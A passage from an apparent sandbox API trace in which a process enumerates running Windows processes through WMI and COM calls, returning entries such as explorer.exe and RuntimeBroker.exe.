IWbemClassObject:Get (in: This=0x550bc18, wszName="__PATH", lFlags=0, pVal=0x19f1b0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f234*=0, plFlavor=0x19f230*=0 | out: pVal=0x19f1b0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"1932\"", varVal2=0x0), pType=0x19f234*=8, plFlavor=0x19f230*=64) returned 0x0 [0264.243] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"1932\"") returned 0x5e [0264.243] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"1932\"") returned 0x5e [0264.243] CoGetObjectContext (in: riid=0x2232ee0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19f1dc | out: ppv=0x19f1dc*=0x601a94) returned 0x0 [0264.244] IComThreadingInfo:GetCurrentApartmentType (in: This=0x601a94, pAptType=0x19f1d4 | out: pAptType=0x19f1d4*=1) returned 0x0 [0264.244] IUnknown:QueryInterface (in: This=0x601a94, riid=0x2232ec8*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x19f1d8 | out: ppvObject=0x19f1d8*=0x0) returned 0x80004002 [0264.244] IUnknown:Release (This=0x601a94) returned 0x1 [0264.245] CoGetClassObject (in: rclsid=0x6be02c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x6bfc54e0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19eb48 | out: ppv=0x19eb48*=0x54ba388) returned 0x0 [0264.245] WbemDefPath:IUnknown:QueryInterface (in: This=0x54ba388, riid=0x6bf795e0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19ed60 | out: ppvObject=0x19ed60*=0x0) returned 0x80004002 [0264.245] WbemDefPath:IClassFactory:CreateInstance (in: This=0x54ba388, pUnkOuter=0x0, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ed74 | out: ppvObject=0x19ed74*=0x6617f0) returned 0x0 [0264.245] WbemDefPath:IUnknown:Release (This=0x54ba388) returned 0x0 [0264.245] WbemDefPath:IUnknown:QueryInterface (in: This=0x6617f0, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e994 | out: ppvObject=0x19e994*=0x6617f0) returned 0x0 [0264.245] WbemDefPath:IUnknown:QueryInterface (in: This=0x6617f0, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e950 | out: ppvObject=0x19e950*=0x0) returned 0x80004002 [0264.245] WbemDefPath:IUnknown:QueryInterface (in: This=0x6617f0, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e544 | out: ppvObject=0x19e544*=0x0) returned 0x80004002 [0264.245] WbemDefPath:IUnknown:AddRef (This=0x6617f0) returned 0x3 [0264.245] WbemDefPath:IUnknown:QueryInterface (in: This=0x6617f0, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e2ac | out: ppvObject=0x19e2ac*=0x0) returned 0x80004002 [0264.245] WbemDefPath:IUnknown:QueryInterface (in: This=0x6617f0, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e25c | out: ppvObject=0x19e25c*=0x0) returned 0x80004002 [0264.245] WbemDefPath:IUnknown:QueryInterface (in: This=0x6617f0, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e268 | out: ppvObject=0x19e268*=0x662088) returned 0x0 [0264.246] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x662088, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e270 | out: pCid=0x19e270*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0264.246] WbemDefPath:IUnknown:Release (This=0x662088) returned 0x3 [0264.246] CoGetContextToken (in: pToken=0x19e2c8 | out: pToken=0x19e2c8) returned 0x0 [0264.246] CoGetContextToken (in: pToken=0x19e6d0 | out: pToken=0x19e6d0) returned 0x0 [0264.246] WbemDefPath:IUnknown:QueryInterface (in: This=0x6617f0, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e760 | out: ppvObject=0x19e760*=0x0) returned 0x80004002 [0264.246] WbemDefPath:IUnknown:Release (This=0x6617f0) returned 0x2 [0264.246] WbemDefPath:IUnknown:Release (This=0x6617f0) returned 0x1 [0264.246] CoGetContextToken (in: pToken=0x19f058 | out: pToken=0x19f058) returned 0x0 [0264.246] CoGetContextToken (in: pToken=0x19efb8 | out: pToken=0x19efb8) returned 0x0 [0264.246] WbemDefPath:IUnknown:QueryInterface (in: This=0x6617f0, riid=0x19f088*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x19f084 | out: ppvObject=0x19f084*=0x6617f0) returned 0x0 [0264.246] WbemDefPath:IUnknown:AddRef (This=0x6617f0) returned 0x3 [0264.246] WbemDefPath:IUnknown:Release (This=0x6617f0) returned 0x2 [0264.246] WbemDefPath:IWbemPath:SetText (This=0x6617f0, uMode=0x4, pszPath="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"1932\"") returned 0x0 [0264.246] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f208 | out: puCount=0x19f208*=0x2) returned 0x0 [0264.247] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f204*=0x0, pszText=0x0 | out: puBuffLength=0x19f204*=0xf, pszText=0x0) returned 0x0 [0264.247] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f204*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f204*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0264.247] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f1d4 | out: puCount=0x19f1d4*=0x2) returned 0x0 [0264.247] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1d0*=0x0, pszText=0x0 | out: puBuffLength=0x19f1d0*=0xf, pszText=0x0) returned 0x0 [0264.247] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1d0*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f1d0*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0264.247] IWbemClassObject:Get (in: This=0x550bc18, wszName="Name", lFlags=0, pVal=0x19f1d0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x23c5374*=0, plFlavor=0x23c5378*=0 | out: pVal=0x19f1d0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="explorer.exe", varVal2=0x0), pType=0x23c5374*=8, plFlavor=0x23c5378*=0) returned 0x0 [0264.247] SysStringByteLen (bstr="explorer.exe") returned 0x18 [0264.247] SysStringByteLen (bstr="explorer.exe") returned 0x18 [0264.247] IWbemClassObject:Get (in: This=0x550bc18, wszName="Name", lFlags=0, pVal=0x19f1d8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x23c5374*=8, plFlavor=0x23c5378*=0 | out: pVal=0x19f1d8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="explorer.exe", varVal2=0x0), pType=0x23c5374*=8, plFlavor=0x23c5378*=0) returned 0x0 [0264.247] SysStringByteLen (bstr="explorer.exe") returned 0x18 [0264.247] SysStringByteLen (bstr="explorer.exe") returned 0x18 [0264.248] CoTaskMemAlloc (cb=0x4) returned 0x54ba388 [0264.248] IEnumWbemClassObject:Next (in: This=0x663848, lTimeout=-1, uCount=0x1, apObjects=0x54ba388, puReturned=0x23c1fd0 | out: apObjects=0x54ba388*=0x550b5a0, puReturned=0x23c1fd0*=0x1) returned 0x0 [0264.249] IUnknown:QueryInterface (in: This=0x550b5a0, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e840 | out: ppvObject=0x19e840*=0x550b5a0) returned 0x0 [0264.249] IUnknown:QueryInterface (in: This=0x550b5a0, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e7fc | out: ppvObject=0x19e7fc*=0x0) returned 0x80004002 [0264.249] IUnknown:QueryInterface (in: This=0x550b5a0, riid=0x6c04fb20*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19e61c | out: ppvObject=0x19e61c*=0x0) returned 0x80004002 [0264.249] IUnknown:QueryInterface (in: This=0x550b5a0, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e3f4 | out: ppvObject=0x19e3f4*=0x0) returned 0x80004002 [0264.249] IUnknown:AddRef (This=0x550b5a0) returned 0x3 [0264.249] IUnknown:QueryInterface (in: This=0x550b5a0, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e15c | out: ppvObject=0x19e15c*=0x0) returned 0x80004002 [0264.249] IUnknown:QueryInterface (in: This=0x550b5a0, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e10c | out: ppvObject=0x19e10c*=0x0) returned 0x80004002 [0264.249] IUnknown:QueryInterface (in: This=0x550b5a0, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e118 | out: ppvObject=0x19e118*=0x550b5a4) returned 0x0 [0264.249] IMarshal:GetUnmarshalClass (in: This=0x550b5a4, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e120 | out: pCid=0x19e120*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0264.249] IUnknown:Release (This=0x550b5a4) returned 0x3 [0264.249] CoGetContextToken (in: pToken=0x19e178 | out: pToken=0x19e178) returned 0x0 [0264.250] CoGetContextToken (in: pToken=0x19e580 | out: pToken=0x19e580) returned 0x0 [0264.250] IUnknown:QueryInterface (in: This=0x550b5a0, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e610 | out: ppvObject=0x19e610*=0x0) returned 0x80004002 [0264.250] IUnknown:Release (This=0x550b5a0) returned 0x2 [0264.250] CoGetContextToken (in: pToken=0x19eb50 | out: pToken=0x19eb50) returned 0x0 [0264.250] CoGetContextToken (in: pToken=0x19eab0 | out: pToken=0x19eab0) returned 0x0 [0264.250] IUnknown:QueryInterface (in: This=0x550b5a0, riid=0x19eb80*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x19eb7c | out: ppvObject=0x19eb7c*=0x550b5a0) returned 0x0 [0264.250] IUnknown:AddRef (This=0x550b5a0) returned 0x4 [0264.250] IUnknown:Release (This=0x550b5a0) returned 0x3 [0264.250] IUnknown:Release (This=0x550b5a0) returned 0x2 [0264.250] CoTaskMemFree (pv=0x54ba388) [0264.250] CoGetContextToken (in: pToken=0x19eeb8 | out: pToken=0x19eeb8) returned 0x0 [0264.250] IUnknown:AddRef (This=0x550b5a0) returned 0x3 [0264.250] IWbemClassObject:Get (in: This=0x550b5a0, wszName="__GENUS", lFlags=0, pVal=0x19f1cc*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f24c*=0, plFlavor=0x19f248*=0 | out: pVal=0x19f1cc*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x19f24c*=3, plFlavor=0x19f248*=64) returned 0x0 [0264.250] IWbemClassObject:Get (in: This=0x550b5a0, wszName="__PATH", lFlags=0, pVal=0x19f1b0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f234*=0, plFlavor=0x19f230*=0 | out: pVal=0x19f1b0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"2040\"", varVal2=0x0), pType=0x19f234*=8, plFlavor=0x19f230*=64) returned 0x0 [0264.251] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"2040\"") returned 0x5e [0264.251] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"2040\"") returned 0x5e [0264.251] CoGetObjectContext (in: riid=0x2232ee0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19f1dc | out: ppv=0x19f1dc*=0x601a94) returned 0x0 [0264.251] IComThreadingInfo:GetCurrentApartmentType (in: This=0x601a94, pAptType=0x19f1d4 | out: pAptType=0x19f1d4*=1) returned 0x0 [0264.251] IUnknown:QueryInterface (in: This=0x601a94, riid=0x2232ec8*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x19f1d8 | out: ppvObject=0x19f1d8*=0x0) returned 0x80004002 [0264.251] IUnknown:Release (This=0x601a94) returned 0x1 [0264.252] CoGetClassObject (in: rclsid=0x6be02c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x6bfc54e0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19eb48 | out: ppv=0x19eb48*=0x54ba388) returned 0x0 [0264.252] WbemDefPath:IUnknown:QueryInterface (in: This=0x54ba388, riid=0x6bf795e0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19ed60 | out: ppvObject=0x19ed60*=0x0) returned 0x80004002 [0264.252] WbemDefPath:IClassFactory:CreateInstance (in: This=0x54ba388, pUnkOuter=0x0, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ed74 | out: ppvObject=0x19ed74*=0x661390) returned 0x0 [0264.252] WbemDefPath:IUnknown:Release (This=0x54ba388) returned 0x0 [0264.252] WbemDefPath:IUnknown:QueryInterface (in: This=0x661390, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e994 | out: ppvObject=0x19e994*=0x661390) returned 0x0 [0264.290] WbemDefPath:IUnknown:QueryInterface (in: This=0x661390, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e950 | out: ppvObject=0x19e950*=0x0) returned 0x80004002 [0264.290] WbemDefPath:IUnknown:QueryInterface (in: This=0x661390, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e544 | out: ppvObject=0x19e544*=0x0) returned 0x80004002 [0264.290] WbemDefPath:IUnknown:AddRef (This=0x661390) returned 0x3 [0264.290] WbemDefPath:IUnknown:QueryInterface (in: This=0x661390, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e2ac | out: ppvObject=0x19e2ac*=0x0) returned 0x80004002 [0264.290] WbemDefPath:IUnknown:QueryInterface (in: This=0x661390, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e25c | out: ppvObject=0x19e25c*=0x0) returned 0x80004002 [0264.290] WbemDefPath:IUnknown:QueryInterface (in: This=0x661390, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e268 | out: ppvObject=0x19e268*=0x5513e50) returned 0x0 [0264.290] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5513e50, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e270 | out: pCid=0x19e270*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0264.290] WbemDefPath:IUnknown:Release (This=0x5513e50) returned 0x3 [0264.290] CoGetContextToken (in: pToken=0x19e2c8 | out: pToken=0x19e2c8) returned 0x0 [0264.291] CoGetContextToken (in: pToken=0x19e6d0 | out: pToken=0x19e6d0) returned 0x0 [0264.291] WbemDefPath:IUnknown:QueryInterface (in: This=0x661390, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e760 | out: ppvObject=0x19e760*=0x0) returned 0x80004002 [0264.291] WbemDefPath:IUnknown:Release (This=0x661390) returned 0x2 [0264.291] WbemDefPath:IUnknown:Release (This=0x661390) returned 0x1 [0264.291] CoGetContextToken (in: pToken=0x19f058 | out: pToken=0x19f058) returned 0x0 [0264.291] CoGetContextToken (in: pToken=0x19efb8 | out: pToken=0x19efb8) returned 0x0 [0264.291] WbemDefPath:IUnknown:QueryInterface (in: This=0x661390, riid=0x19f088*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x19f084 | out: ppvObject=0x19f084*=0x661390) returned 0x0 [0264.291] WbemDefPath:IUnknown:AddRef (This=0x661390) returned 0x3 [0264.291] WbemDefPath:IUnknown:Release (This=0x661390) returned 0x2 [0264.291] WbemDefPath:IWbemPath:SetText (This=0x661390, uMode=0x4, pszPath="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"2040\"") returned 0x0 [0264.291] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f208 | out: puCount=0x19f208*=0x2) returned 0x0 [0264.291] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f204*=0x0, pszText=0x0 | out: puBuffLength=0x19f204*=0xf, pszText=0x0) returned 0x0 [0264.291] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f204*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f204*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0264.291] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f1d4 | out: puCount=0x19f1d4*=0x2) returned 0x0 [0264.291] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1d0*=0x0, pszText=0x0 | out: puBuffLength=0x19f1d0*=0xf, pszText=0x0) returned 0x0 [0264.291] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1d0*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f1d0*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0264.292] IWbemClassObject:Get (in: This=0x550b5a0, wszName="Name", lFlags=0, pVal=0x19f1d0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x23c5c08*=0, plFlavor=0x23c5c0c*=0 | out: pVal=0x19f1d0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="RuntimeBroker.exe", varVal2=0x0), pType=0x23c5c08*=8, plFlavor=0x23c5c0c*=0) returned 0x0 [0264.292] SysStringByteLen (bstr="RuntimeBroker.exe") returned 0x22 [0264.292] SysStringByteLen (bstr="RuntimeBroker.exe") returned 0x22 [0264.292] IWbemClassObject:Get (in: This=0x550b5a0, wszName="Name", lFlags=0, pVal=0x19f1d8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x23c5c08*=8, plFlavor=0x23c5c0c*=0 | out: pVal=0x19f1d8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="RuntimeBroker.exe", varVal2=0x0), pType=0x23c5c08*=8, plFlavor=0x23c5c0c*=0) returned 0x0 [0264.292] SysStringByteLen (bstr="RuntimeBroker.exe") returned 0x22 [0264.292] SysStringByteLen (bstr="RuntimeBroker.exe") returned 0x22 [0264.292] CoTaskMemAlloc (cb=0x4) returned 0x54ba2c8 [0264.292] IEnumWbemClassObject:Next (in: This=0x663848, lTimeout=-1, uCount=0x1, apObjects=0x54ba2c8, puReturned=0x23c1fd0 | out: apObjects=0x54ba2c8*=0x550b280, puReturned=0x23c1fd0*=0x1) returned 0x0 [0264.293] IUnknown:QueryInterface (in: This=0x550b280, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e840 | out: ppvObject=0x19e840*=0x550b280) returned 0x0 [0264.293] IUnknown:QueryInterface (in: This=0x550b280, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e7fc | out: ppvObject=0x19e7fc*=0x0) returned 0x80004002 [0264.293] IUnknown:QueryInterface (in: This=0x550b280, riid=0x6c04fb20*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19e61c | out: ppvObject=0x19e61c*=0x0) returned 0x80004002 [0264.293] IUnknown:QueryInterface (in: This=0x550b280, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e3f4 | out: ppvObject=0x19e3f4*=0x0) returned 0x80004002 [0264.293] IUnknown:AddRef (This=0x550b280) returned 0x3 [0264.293] IUnknown:QueryInterface (in: This=0x550b280, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e15c | out: ppvObject=0x19e15c*=0x0) returned 0x80004002 [0264.294] IUnknown:QueryInterface (in: This=0x550b280, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e10c | out: ppvObject=0x19e10c*=0x0) returned 0x80004002 [0264.294] IUnknown:QueryInterface (in: This=0x550b280, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e118 | out: ppvObject=0x19e118*=0x550b284) returned 0x0 [0264.294] IMarshal:GetUnmarshalClass (in: This=0x550b284, riid=0x6bf16c6c*(Data1=0x0, 